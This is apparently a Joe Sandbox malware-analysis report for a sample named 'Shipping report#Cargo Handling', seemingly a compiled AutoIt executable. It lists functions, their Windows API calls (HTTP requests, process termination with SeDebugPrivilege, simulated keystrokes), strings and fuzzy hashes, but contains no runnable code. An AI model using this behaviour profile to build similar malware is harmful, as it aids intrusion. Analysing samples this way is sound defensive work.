Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile
String ID: *.*
API String ID: 769691225-438819550
Opcode ID: 0418ead2f3def92c630afbc459ed6ea7863679f7ec04aba2c73e90d81e3dcf5d
Instruction ID: a3cfd99b314c5a56f0560ccec430334026fe961f446ed2af94f6d632ba2cc043
Opcode Fuzzy Hash: 0418ead2f3def92c630afbc459ed6ea7863679f7ec04aba2c73e90d81e3dcf5d
Instruction Fuzzy Hash: FC8190729082059BCB24EF14C4549AEB3E9BF88310F544C6AF8C9C72D1EBB5ED45CB92

Function 00095BEA Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 184windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,000000EB), ref: 00095C7A

Part of subcall function 00095D0A: GetClientRect.USER32(?,?), ref: 00095D30
Part of subcall function 00095D0A: GetWindowRect.USER32(?,?), ref: 00095D71
Part of subcall function 00095D0A: ScreenToClient.USER32(?,?), ref: 00095D99

GetDC.USER32 ref: 000D46F5
SendMessageW.USER32(?,00000031,00000000,00000000), ref: 000D4708
SelectObject.GDI32(00000000,00000000), ref: 000D4716
SelectObject.GDI32(00000000,00000000), ref: 000D472B
ReleaseDC.USER32(?,00000000), ref: 000D4733
MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 000D47C4

Strings

U, xrefs: 000D4693

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: a368638096b0d5d5a2ed72a36aa3dc65e513103a05e27a82a42c27bc944b933c
Instruction ID: 396b576acfb95ff988a8fb3ffece80f3fe20a9c9ee581a9be9414b843818c06f
Opcode Fuzzy Hash: a368638096b0d5d5a2ed72a36aa3dc65e513103a05e27a82a42c27bc944b933c
Instruction Fuzzy Hash: 4B71C031504305EFCF218F64CD84ABE7BF5FF4A355F18426AE9565A2A6C7308891EF60

Function 0010359C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 150COMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000066,?,00000FFF,00000000), ref: 001035E4

Part of subcall function 00099CB3: _wcslen.LIBCMT ref: 00099CBD

LoadStringW.USER32(00162390,?,00000FFF,?), ref: 0010360A

Strings

"%s" (%d) : ==> %s:%s%s, xrefs: 00103724
Line %d (File "%s"):, xrefs: 0010366B
^ ERROR, xrefs: 001036C9
"%s" (%d) : ==> %s:, xrefs: 00103742
Error: , xrefs: 001036EF

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: LoadString$_wcslen
String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
API String ID: 4099089115-2391861430
Opcode ID: be867909ac0d366cd25d1f30ed4331368b097800048f8a8df5fb3c3caf7e371b
Instruction ID: a8676e6321919d77516b08f0de2b15a1379b47f748dd9134035ee6799044f52f
Opcode Fuzzy Hash: be867909ac0d366cd25d1f30ed4331368b097800048f8a8df5fb3c3caf7e371b
Instruction Fuzzy Hash: 76516C72800209BBDF15EBE0DC42EEEBB78AF14310F544129F515721A2EB711B99EFA1

Function 0010C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0010C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0010C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0010C2CA
GetLastError.KERNEL32 ref: 0010C322
SetEvent.KERNEL32(?), ref: 0010C336
InternetCloseHandle.WININET(00000000), ref: 0010C341

Strings

, xrefs: 0010C2BB

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: fb3c9f4a87857d667925f4281dec9cf2ea6ceed8283bcc2bcc1b6aeec4a44c21
Instruction ID: 3eb14c92e9f70365d71e196e13dd8dce4354bd573b6d0d14db2d4e4599baf848
Opcode Fuzzy Hash: fb3c9f4a87857d667925f4281dec9cf2ea6ceed8283bcc2bcc1b6aeec4a44c21
Instruction Fuzzy Hash: 91318DB1500604AFD7219FA48888AAB7AFCFB59740B10861EF48696680DBB0DD459FE0

Function 000F989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,000D3AAF,?,?,Bad directive syntax error,0012CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 000F98BC
LoadStringW.USER32(00000000,?,000D3AAF,?), ref: 000F98C3

Part of subcall function 00099CB3: _wcslen.LIBCMT ref: 00099CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 000F9987

Strings

Line %d:, xrefs: 000F9912
Error: , xrefs: 000F9955
%s (%d) : ==> %s.: %s %s, xrefs: 000F98F1
Line %d (File "%s"):, xrefs: 000F992D
., xrefs: 000F996D

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 20210c46f7fff7ca624b8c62984abc59f665b34b4a50886c80ecd3036bff3676
Instruction ID: 85865f7a430782b04d08e368b2ea002ff149c76708fb6c52624f30a41f1fa7cd
Opcode Fuzzy Hash: 20210c46f7fff7ca624b8c62984abc59f665b34b4a50886c80ecd3036bff3676
Instruction Fuzzy Hash: 4C215E3194421EFBCF15AF90CC06EFE7775BF18301F44446AFA25660A2EB719668EB60

Function 000F209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 000F20AB
GetClassNameW.USER32(00000000,?,00000100), ref: 000F20C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 000F214D

Strings

smallicons, xrefs: 000F2115
SHELLDLL_DefView, xrefs: 000F20CC
details, xrefs: 000F20FB
largeicons, xrefs: 000F20E1
list, xrefs: 000F212F

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: a2666cca7e14248f7558eb985275557742a9da523e61debcdd5c813c24868227
Instruction ID: 6a3c064034dd58b108f0fb808d82f597254832492b6f2aacd4d600f0ce2644c5
Opcode Fuzzy Hash: a2666cca7e14248f7558eb985275557742a9da523e61debcdd5c813c24868227
Instruction Fuzzy Hash: 68115C7628470AF9FB116220DC1BDFB73DDEF15325B200116FB04A84D3FFA1A8566519

Function 000C8D45 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1bd428e64b40422959acc3251a1049ff0a58be2b8b9cbea2b3e8a7a86a35d8e4
Instruction ID: a4cb4ed7d19a36319615b997dc0b83f9fc0f5b90d1115115f94f333dfe282da2
Opcode Fuzzy Hash: 1bd428e64b40422959acc3251a1049ff0a58be2b8b9cbea2b3e8a7a86a35d8e4
Instruction Fuzzy Hash: 38C1D074A04249AFDB21DFA8CC49FEDBBF0AF09310F14419DE915A7392CB709942CB65

Function 000CCE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 000CCEB7
_free.LIBCMT ref: 000CCF22
_free.LIBCMT ref: 000CCF48
_free.LIBCMT ref: 000CCF71
_free.LIBCMT ref: 000CCFA9
_free.LIBCMT ref: 000CCFDA
_free.LIBCMT ref: 000CD01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 000CD09C
_free.LIBCMT ref: 000CD0B5

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: d698efdde19d7321dc0f08bd7764ae823eee0bba4c6135f1047117fb5b033e63
Instruction ID: 0a41962160d62c2d33724cbf6498c84559b68483db29c4027543ecfa2ca9c561
Opcode Fuzzy Hash: d698efdde19d7321dc0f08bd7764ae823eee0bba4c6135f1047117fb5b033e63
Instruction Fuzzy Hash: CD611571904301AFEB21AFB8DC81FAE7BE5EF05320F19427EF94997282D6719D428790

Function 001250D4 Relevance: 13.7, APIs: 9, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00125186
ShowWindow.USER32(?,00000000), ref: 001251C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 001251CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 001251D1

Part of subcall function 00126FBA: DeleteObject.GDI32(00000000), ref: 00126FE6

GetWindowLongW.USER32(?,000000F0), ref: 0012520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0012521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0012524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00125287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00125296

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID:
API String ID: 3210457359-0
Opcode ID: 80f9a5e50097aff7e0c855fbd3bf66d40ae1c63c31315580be2077087ca9479a
Instruction ID: 1866615dd884e6cdbf3f3e84bd0e0e89248e426fb34fbf11059ac45fd2a08cd8
Opcode Fuzzy Hash: 80f9a5e50097aff7e0c855fbd3bf66d40ae1c63c31315580be2077087ca9479a
Instruction Fuzzy Hash: B851C030A50A28FEEF349F24EC8ABE83B67FB05365F184011F615962E1C375A9B0DB50

Function 000A8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 000E6890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 000E68A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000E68B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 000E68D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000E68F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,000A8874,00000000,00000000,00000000,000000FF,00000000), ref: 000E6901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 000E691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,000A8874,00000000,00000000,00000000,000000FF,00000000), ref: 000E692D

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 60d296a37f1f3a71984567575bace4d02f44fd959fe84504ab5b15e7a37b5623
Instruction ID: 2bc8a445810d4129fdc4f8bdfafb2207149bc2a7c628dd8642a45f3adb9774bc
Opcode Fuzzy Hash: 60d296a37f1f3a71984567575bace4d02f44fd959fe84504ab5b15e7a37b5623
Instruction Fuzzy Hash: AE51A870610209EFDB20CF65DC55BAA7BF5FB58350F108628FA12A76A0DB71E990DB60

Function 0010C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0010C182
GetLastError.KERNEL32 ref: 0010C195
SetEvent.KERNEL32(?), ref: 0010C1A9

Part of subcall function 0010C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0010C272
Part of subcall function 0010C253: GetLastError.KERNEL32 ref: 0010C322
Part of subcall function 0010C253: SetEvent.KERNEL32(?), ref: 0010C336
Part of subcall function 0010C253: InternetCloseHandle.WININET(00000000), ref: 0010C341

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 5eb332dd2cd723f5a5430339ef65159e868dbea9295e3f47a7ccc956ee41f2ac
Instruction ID: b24d994695d1cdf0c088c72dffcb8feb861beb13cfcef79852725dff3aff49e3
Opcode Fuzzy Hash: 5eb332dd2cd723f5a5430339ef65159e868dbea9295e3f47a7ccc956ee41f2ac
Instruction Fuzzy Hash: 2C318E71600601FFDB259FE5DD44A6ABBF9FF18300B04861DFA9682A50DB70E8659FE0

Function 000F25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 000F3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 000F3A57
Part of subcall function 000F3A3D: GetCurrentThreadId.KERNEL32 ref: 000F3A5E
Part of subcall function 000F3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000F25B3), ref: 000F3A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 000F25BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 000F25DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 000F25DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 000F25E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 000F2601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 000F2605
MapVirtualKeyW.USER32(00000025,00000000), ref: 000F260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 000F2623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 000F2627

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 699afed08d2b87bac6545a1c5c604c135a9644556e9936eceb7f363fb5fece8f
Instruction ID: 637c726e70e1bc74fd6dabb84516db82f3f4bc1f34ef8905d75f9b6ce77cd317
Opcode Fuzzy Hash: 699afed08d2b87bac6545a1c5c604c135a9644556e9936eceb7f363fb5fece8f
Instruction Fuzzy Hash: 9401D830390614BBFB2067699C8AFAD3F59DF4EB11F100001F314AE1D1C9F214959AAA

Function 000F1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,000F1449,?,?,00000000), ref: 000F180C
HeapAlloc.KERNEL32(00000000,?,000F1449,?,?,00000000), ref: 000F1813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,000F1449,?,?,00000000), ref: 000F1828
GetCurrentProcess.KERNEL32(?,00000000,?,000F1449,?,?,00000000), ref: 000F1830
DuplicateHandle.KERNEL32(00000000,?,000F1449,?,?,00000000), ref: 000F1833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,000F1449,?,?,00000000), ref: 000F1843
GetCurrentProcess.KERNEL32(000F1449,00000000,?,000F1449,?,?,00000000), ref: 000F184B
DuplicateHandle.KERNEL32(00000000,?,000F1449,?,?,00000000), ref: 000F184E
CreateThread.KERNEL32(00000000,00000000,000F1874,00000000,00000000,00000000), ref: 000F1868

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 19275c10cedfd0d3bc4cd972224eedf9a52fd0c2a8da2dc0e5483f18f66a000e
Instruction ID: b1ae5403b67bb2269907471d660cbb6d4134504d3e82b9c7c1d971ca458cae69
Opcode Fuzzy Hash: 19275c10cedfd0d3bc4cd972224eedf9a52fd0c2a8da2dc0e5483f18f66a000e
Instruction Fuzzy Hash: 8401BF75640308FFE720AB65DC4EF6B3B6CEB89B11F104411FB05DB591CA709865CB60

Function 0011A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 000FD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 000FD501
Part of subcall function 000FD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 000FD50F
Part of subcall function 000FD4DC: CloseHandle.KERNEL32(00000000), ref: 000FD5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0011A16D
GetLastError.KERNEL32 ref: 0011A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0011A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0011A268
GetLastError.KERNEL32(00000000), ref: 0011A273
CloseHandle.KERNEL32(00000000), ref: 0011A2C4

Strings

SeDebugPrivilege, xrefs: 0011A18F

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: ada598c93d380e78379e217ce853a39c90fd5a405037a62346bf40968ddb6b5b
Instruction ID: 52d415ca81cd54b6bcc0a3ea828ca248ec7423d6bc4f1a8c47252faf38ef736c
Opcode Fuzzy Hash: ada598c93d380e78379e217ce853a39c90fd5a405037a62346bf40968ddb6b5b
Instruction Fuzzy Hash: 1A61C331205241AFD724DF14C494FA9BBE1AF44318F5484ACE45A8BB93C772ED85CBD2

Function 00123886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00123925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0012393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00123954
_wcslen.LIBCMT ref: 00123999
SendMessageW.USER32(?,00001057,00000000,?), ref: 001239C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 001239F4

Strings

SysListView32, xrefs: 001238F7

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_90000_Shipping report#Cargo Handling.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 8109812abb349c5c0b79069587ed4c740d4cf60639a55e5dc8e26c781b961ef8
Instruction ID: 0a88bc3f5b75e9f5b933eae8e175551ef4146547f32b4ea26e612cc61455fad9
Opcode Fuzzy Hash: 8109812abb349c5c0b79069587ed4c740d4cf60639a55e5dc8e26c781b961ef8
Instruction Fuzzy Hash: B941C671A00228BBDF219F64DC49BEE77A9EF08354F100526F954E7281D7759DA0CB90

Function 000FBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000FBCFD
IsMenu.USER32(00000000), ref: 000FBD1D
CreatePopupMenu.USER32 ref: 000FBD53
GetMenuItemCount.USER32(00C678C0), ref: 000FBDA4
InsertMenuItemW.USER32(00C678C0,?,00000001,00000030), ref: 000FBDCC

Strings

2, xrefs: 000FBD37
0, xrefs: 000FBCA8

Memory Dump Source

Source File: 00000000.00000002.1878961509.0000000000091000.00000020.00000001.01000000.00000003.sdmp, Offset: 00090000, based on PE: true

Associated: 00000000.00000002.1878943847.0000000000090000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.000000000012C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879015804.0000000000152000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879071163.000000000015C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1879090258.0000000000164000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

